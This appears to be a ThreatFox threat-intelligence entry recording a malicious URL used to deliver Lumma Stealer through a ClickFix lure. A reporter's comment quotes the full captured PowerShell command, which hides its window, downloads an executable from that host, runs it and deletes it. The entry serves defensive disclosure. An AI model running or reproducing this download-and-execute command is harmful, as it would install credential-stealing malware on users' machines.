ThreatFox IOC Database
You are viewing the ThreatFox database entry for url https://purplefeetwines.monster.
Database Entry
| IOC ID: | 1801915 |
|---|---|
| IOC: | https://purplefeetwines.monster |
| IOC Type : | url |
| Threat Type : | payload_delivery |
| Malware: | Lumma Stealer |
| Malware alias: | LummaC2 Stealer |
| Confidence Level : | Confidence level is high (100%) |
| Is compromised? : | False |
| ASN: | AS214927 PSB-AS |
| Country: |  RU |
| First seen: | 2026-04-29 07:49:22 UTC |
| Last seen: | never |
| UUID: | 5caebc3a-4375-11f1-8759-42010aa4000a |
| Reporter |  YuanGeng |
| Reward | 5 credits from ThreatFox |
| Tags: | ClickFix ErrTraffic |
YuanGeng
Clickfix command"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command [System.Net.ServicePointManager]::SecurityProtocol=[System.Net.SecurityProtocolType]::Tls12;$c3=Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName());New-Item -ItemType Directory -Path $c3 -Force|Out-Null;$d4=Join-Path $c3 ([System.IO.Path]::GetRandomFileName()+'.exe');$e5=0;for($f6=0;$f6 -lt 3 -and -not $e5;$f6++){try{Invoke-WebRequest -Uri 'https://purplefeetwines.monster/api/index.php?a=dl&token=d857b2ed0bc8ec772b008d08b6e6ef8d4b0f6022ec963f6a92f961e71a324a03&src=recaptcha&cb=chrome&ref=https%3A%2F%2Fzonerealhub.monster%2F&mode=recaptcha' -OutFile $d4 -UseBasicParsing;if(Test-Path $d4){$e5=1}else{Start-Sleep -Seconds 2}}catch{Start-Sleep -Seconds 2}};if(-not (Test-Path $d4)){exit};Start-Process -FilePath $d4 -WindowStyle Hidden;try{Remove-Item -LiteralPath $d4 -Force -ErrorAction SilentlyContinue}catch{};